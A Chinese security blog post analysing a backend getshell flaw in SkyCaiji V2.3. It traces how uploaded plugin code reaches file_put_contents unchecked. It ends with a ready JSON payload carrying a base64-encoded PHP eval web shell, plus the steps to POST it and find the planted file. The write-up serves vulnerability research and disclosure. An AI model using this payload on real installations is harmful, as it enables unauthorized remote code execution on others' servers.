<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="代码审计,">





  <link rel="alternate" href="/atom.xml" title="yemoli's blog" type="application/atom+xml">






<meta name="description" content="前言蓝天采集器是一款免费的数据采集发布爬虫软件，采用php+mysql开发，可部署在云服务器，几乎能采集所有类型的网页，无缝对接各类CMS建站程序，免登录实时发布数据，全自动无需人工干预！是大数据、云时代网站数据自动化采集的最佳云端爬虫软件，2.3版本下载地址 https://github.com/zorlan/skycaiji/tree/19e77d03c8be2c4e40320ddc56213">
<meta name="keywords" content="代码审计">
<meta property="og:type" content="article">
<meta property="og:title" content="蓝天采集器V2.3后台getshell">
<meta property="og:url" content="https://yml-sec.top/2020/05/09/蓝天采集器V2-3后台getshell/index.html">
<meta property="og:site_name" content="yemoli&#39;s blog">
<meta property="og:description" content="前言蓝天采集器是一款免费的数据采集发布爬虫软件，采用php+mysql开发，可部署在云服务器，几乎能采集所有类型的网页，无缝对接各类CMS建站程序，免登录实时发布数据，全自动无需人工干预！是大数据、云时代网站数据自动化采集的最佳云端爬虫软件，2.3版本下载地址 https://github.com/zorlan/skycaiji/tree/19e77d03c8be2c4e40320ddc56213">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://yml-sec.top/2020/05/09/蓝天采集器V2-3后台getshell/1.png">
<meta property="og:image" content="https://yml-sec.top/2020/05/09/蓝天采集器V2-3后台getshell/2.png">
<meta property="og:updated_time" content="2020-05-09T12:24:53.597Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="蓝天采集器V2.3后台getshell">
<meta name="twitter:description" content="前言蓝天采集器是一款免费的数据采集发布爬虫软件，采用php+mysql开发，可部署在云服务器，几乎能采集所有类型的网页，无缝对接各类CMS建站程序，免登录实时发布数据，全自动无需人工干预！是大数据、云时代网站数据自动化采集的最佳云端爬虫软件，2.3版本下载地址 https://github.com/zorlan/skycaiji/tree/19e77d03c8be2c4e40320ddc56213">
<meta name="twitter:image" content="https://yml-sec.top/2020/05/09/蓝天采集器V2-3后台getshell/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://yml-sec.top/2020/05/09/蓝天采集器V2-3后台getshell/">





  <title>蓝天采集器V2.3后台getshell | yemoli's blog</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">yemoli's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-friends">
          <a href="/friends/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            friends
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://yml-sec.top/2020/05/09/蓝天采集器V2-3后台getshell/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="夜莫离、">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="yemoli's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">蓝天采集器V2.3后台getshell</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-05-09T18:16:05+08:00">
                2020-05-09
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  711
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  3
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>蓝天采集器是一款免费的数据采集发布爬虫软件，采用php+mysql开发，可部署在云服务器，几乎能采集所有类型的网页，无缝对接各类CMS建站程序，免登录实时发布数据，全自动无需人工干预！是大数据、云时代网站数据自动化采集的最佳云端爬虫软件，2.3版本下载地址</p>
<p><a href="https://github.com/zorlan/skycaiji/tree/19e77d03c8be2c4e40320ddc56213c271bc3721e" target="_blank" rel="noopener">https://github.com/zorlan/skycaiji/tree/19e77d03c8be2c4e40320ddc56213c271bc3721e</a></p>
<h1 id="代码分析"><a href="#代码分析" class="headerlink" title="代码分析"></a>代码分析</h1><p>漏洞触发点在<code>/SkycaijiApp/admin/controller/Store.php</code>文件中的<code>installPluginAction</code>函数，代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">installPluginAction</span><span class="params">()</span></span>&#123;</span><br><span class="line">		$plugin=json_decode(base64_decode(input(<span class="string">'post.plugin'</span>)),<span class="keyword">true</span>);</span><br><span class="line">		$plugin[<span class="string">'code'</span>]=base64_decode($plugin[<span class="string">'code'</span>]);</span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">empty</span>($plugin[<span class="string">'app'</span>]))&#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;dispatchJump(<span class="keyword">false</span>,<span class="string">'标识错误'</span>);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">empty</span>($plugin[<span class="string">'name'</span>]))&#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;dispatchJump(<span class="keyword">false</span>,<span class="string">'名称错误'</span>);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">empty</span>($plugin[<span class="string">'type'</span>]))&#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;dispatchJump(<span class="keyword">false</span>,<span class="string">'类型错误'</span>);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">empty</span>($plugin[<span class="string">'module'</span>]))&#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;dispatchJump(<span class="keyword">false</span>,<span class="string">'模块错误'</span>);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">empty</span>($plugin[<span class="string">'code'</span>]))&#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;dispatchJump(<span class="keyword">false</span>,<span class="string">'不是可用的程序'</span>);</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span>(!<span class="keyword">empty</span>($plugin[<span class="string">'tpl'</span>]))&#123;</span><br><span class="line">			</span><br><span class="line">			$plugin[<span class="string">'tpl'</span>]=base64_decode($plugin[<span class="string">'tpl'</span>]);</span><br><span class="line">		&#125;</span><br><span class="line">		</span><br><span class="line">		$newData=<span class="keyword">array</span>(<span class="string">'app'</span>=&gt;$plugin[<span class="string">'app'</span>],<span class="string">'name'</span>=&gt;$plugin[<span class="string">'name'</span>],<span class="string">'desc'</span>=&gt;$plugin[<span class="string">'desc'</span>],<span class="string">'uptime'</span>=&gt;$plugin[<span class="string">'uptime'</span>]);</span><br><span class="line">		</span><br><span class="line">		</span><br><span class="line">		$newData[<span class="string">'provider_id'</span>]=<span class="keyword">$this</span>-&gt;_getStoreProvid($plugin[<span class="string">'store_url'</span>]);</span><br><span class="line">		</span><br><span class="line">		<span class="keyword">if</span>($plugin[<span class="string">'type'</span>]==<span class="string">'release'</span>)&#123;</span><br><span class="line">			</span><br><span class="line">			model(<span class="string">'ReleaseApp'</span>)-&gt;addCms($newData,$plugin[<span class="string">'code'</span>],$plugin[<span class="string">'tpl'</span>]);</span><br><span class="line">			<span class="keyword">$this</span>-&gt;dispatchJump(<span class="keyword">true</span>);</span><br><span class="line">		&#125;<span class="keyword">elseif</span>($plugin[<span class="string">'type'</span>]==<span class="string">'func'</span>)&#123;</span><br><span class="line">			</span><br><span class="line">			$newData[<span class="string">'module'</span>]=$plugin[<span class="string">'module'</span>];</span><br><span class="line">			model(<span class="string">'FuncApp'</span>)-&gt;addFunc($newData,$plugin[<span class="string">'code'</span>]);</span><br><span class="line">			<span class="keyword">$this</span>-&gt;dispatchJump(<span class="keyword">true</span>);</span><br><span class="line">		&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;dispatchJump(<span class="keyword">false</span>);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>
<p>函数直接接收<code>post</code>参数然后进行<code>base64</code>和<code>json</code>解码，接着进行了判空操作，接着如果满足<code>$plugin[&#39;type&#39;]==&#39;release&#39;</code>就会调用<code>addCms</code>函数，跟进该函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">addCms</span><span class="params">($cms,$code=<span class="string">''</span>,$tpl=<span class="string">''</span>)</span></span>&#123;</span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">empty</span>($cms[<span class="string">'app'</span>]))&#123;</span><br><span class="line">			<span class="keyword">return</span> <span class="keyword">false</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		</span><br><span class="line">		$cms[<span class="string">'module'</span>]=<span class="string">'cms'</span>;</span><br><span class="line">		$cms[<span class="string">'uptime'</span>]=$cms[<span class="string">'uptime'</span>]&gt;<span class="number">0</span>?$cms[<span class="string">'uptime'</span>]:NOW_TIME;</span><br><span class="line">		$cmsData=<span class="keyword">$this</span>-&gt;where(<span class="string">'app'</span>,$cms[<span class="string">'app'</span>])-&gt;find();</span><br><span class="line">		$success=<span class="keyword">false</span>;</span><br><span class="line">		</span><br><span class="line">		<span class="keyword">if</span>(!<span class="keyword">empty</span>($cmsData))&#123;</span><br><span class="line">			</span><br><span class="line">			<span class="keyword">$this</span>-&gt;strict(<span class="keyword">false</span>)-&gt;where(<span class="string">'app'</span>,$cms[<span class="string">'app'</span>])-&gt;update($cms);</span><br><span class="line">			$success=<span class="keyword">true</span>;</span><br><span class="line">		&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">			$cms[<span class="string">'addtime'</span>]=NOW_TIME;</span><br><span class="line">			<span class="keyword">$this</span>-&gt;isUpdate(<span class="keyword">false</span>)-&gt;allowField(<span class="keyword">true</span>)-&gt;save($cms);</span><br><span class="line">			$cms[<span class="string">'id'</span>]=<span class="keyword">$this</span>-&gt;id;</span><br><span class="line">			$success=$cms[<span class="string">'id'</span>]&gt;<span class="number">0</span>?<span class="keyword">true</span>:<span class="keyword">false</span>;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">if</span>($success)&#123;</span><br><span class="line">			$cmsAppPath=config(<span class="string">'plugin_path'</span>).<span class="string">'/release'</span>;</span><br><span class="line">			<span class="keyword">if</span>(!<span class="keyword">empty</span>($code))&#123;</span><br><span class="line">				</span><br><span class="line">				write_dir_file($cmsAppPath.<span class="string">'/cms/'</span>.ucfirst($cms[<span class="string">'app'</span>]).<span class="string">'.php'</span>, $code);</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="keyword">if</span>(!<span class="keyword">empty</span>($tpl))&#123;</span><br><span class="line">				</span><br><span class="line">				write_dir_file($cmsAppPath.<span class="string">'/view/cms/'</span>.ucfirst($cms[<span class="string">'app'</span>]).<span class="string">'.html'</span>, $tpl);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">return</span> $success;</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>
<p>该函数中后面如果满足<code>$success</code>为<code>true</code>则会调用<code>write_dir_file</code>函数，跟进该函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">write_dir_file</span><span class="params">($filename,$data,$flags=null,$content=null)</span></span>&#123;</span><br><span class="line">	$dir = dirname($filename);</span><br><span class="line">	<span class="keyword">if</span>(!is_dir($dir))&#123;</span><br><span class="line">		mkdir($dir,<span class="number">0777</span>,<span class="keyword">true</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> file_put_contents($filename,$data,$flags,$content);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>该函数的功能是去执行写文件操作，在整个流程下来后我们会发现，该流程并没有对写入的<code>code</code>进行一些过滤和检查，，那么如果我们可以满足代码流程中的一些条件，就可以实现写入<code>shell</code></p>
<h1 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h1><p>根据代码流程写出对应的<code>json</code>格式<code>payload</code></p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="attr">"app"</span>:<span class="string">"shell"</span>,<span class="attr">"name"</span>:<span class="string">"shell"</span>,<span class="attr">"type"</span>:<span class="string">"release"</span>,<span class="attr">"module"</span>:<span class="string">"ok"</span>,<span class="attr">"code"</span>:<span class="string">"PD9waHAgZXZhbCgkX1BPU1RbYV0pOyA/Pg=="</span>&#125;</span><br></pre></td></tr></table></figure>
<p>其中<code>code</code>在传入后进行了<code>base64</code>解码，在这里要对应的加密</p>
<p>接着将整段<code>payload</code>以<code>base64</code>形式加密，最后以<code>post</code>形式传入进去，如图</p>
<p><img src="/2020/05/09/蓝天采集器V2-3后台getshell/1.png" alt="1"></p>
<p>接着去<code>\plugin\release\cms</code>文件夹下可以看到我们写入的<code>shell</code></p>
<p><img src="/2020/05/09/蓝天采集器V2-3后台getshell/2.png" alt="2"></p>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>坚持原创技术分享，您的支持将鼓励我继续创作！</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>Donate</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatpay.jpg" alt="夜莫离、 WeChat Pay">
        <p>WeChat Pay</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.jpg" alt="夜莫离、 Alipay">
        <p>Alipay</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/代码审计/" rel="tag"># 代码审计</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/05/07/PbootCms-2-0-7模板注入到RCE/" rel="next" title="PbootCms-2.0.7模板注入到RCE">
                <i class="fa fa-chevron-left"></i> PbootCms-2.0.7模板注入到RCE
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/05/15/通达OA任意文件上传与文件包含分析/" rel="prev" title="通达OA任意文件上传与文件包含分析">
                通达OA任意文件上传与文件包含分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">夜莫离、</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">66</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">17</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/yemoli" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://chxing.xyz/" title="Bling_Dog" target="_blank">Bling_Dog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.smi1e.top/" title="Smi1e" target="_blank">Smi1e</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://altman.vip/" title="Altman" target="_blank">Altman</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.virtua1.cn/" title="Virtua1" target="_blank">Virtua1</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.zhaoj.in/" title="赵" target="_blank">赵</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.dongzt.cn/" title="Alkaid" target="_blank">Alkaid</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://cdusec.com/" title="CDUSEC" target="_blank">CDUSEC</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://cdusec.happyhacking.top/" title="CDUSEC内部博客" target="_blank">CDUSEC内部博客</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://jjhpkcr.xyz/" title="江江河畔砍柴人" target="_blank">江江河畔砍柴人</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.youknowi.xin/" title="图先生" target="_blank">图先生</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://a3ura.github.io/" title="a3ura" target="_blank">a3ura</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.recorday.cn/" title="C0d3r1iu" target="_blank">C0d3r1iu</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.iloveflag.com/" title="醉梦半醒" target="_blank">醉梦半醒</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#代码分析"><span class="nav-number">2.</span> <span class="nav-text">代码分析</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#漏洞利用"><span class="nav-number">3.</span> <span class="nav-text">漏洞利用</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">夜莫离、</span>

  
</div>


  <!-- <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div> 



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>-->



<div class="theme-info">
 <div class="powered-by"></div>
 <span class="post-count">博客全站共71.1k字</span>
</div>
        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

  
<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>
</body>
</html>
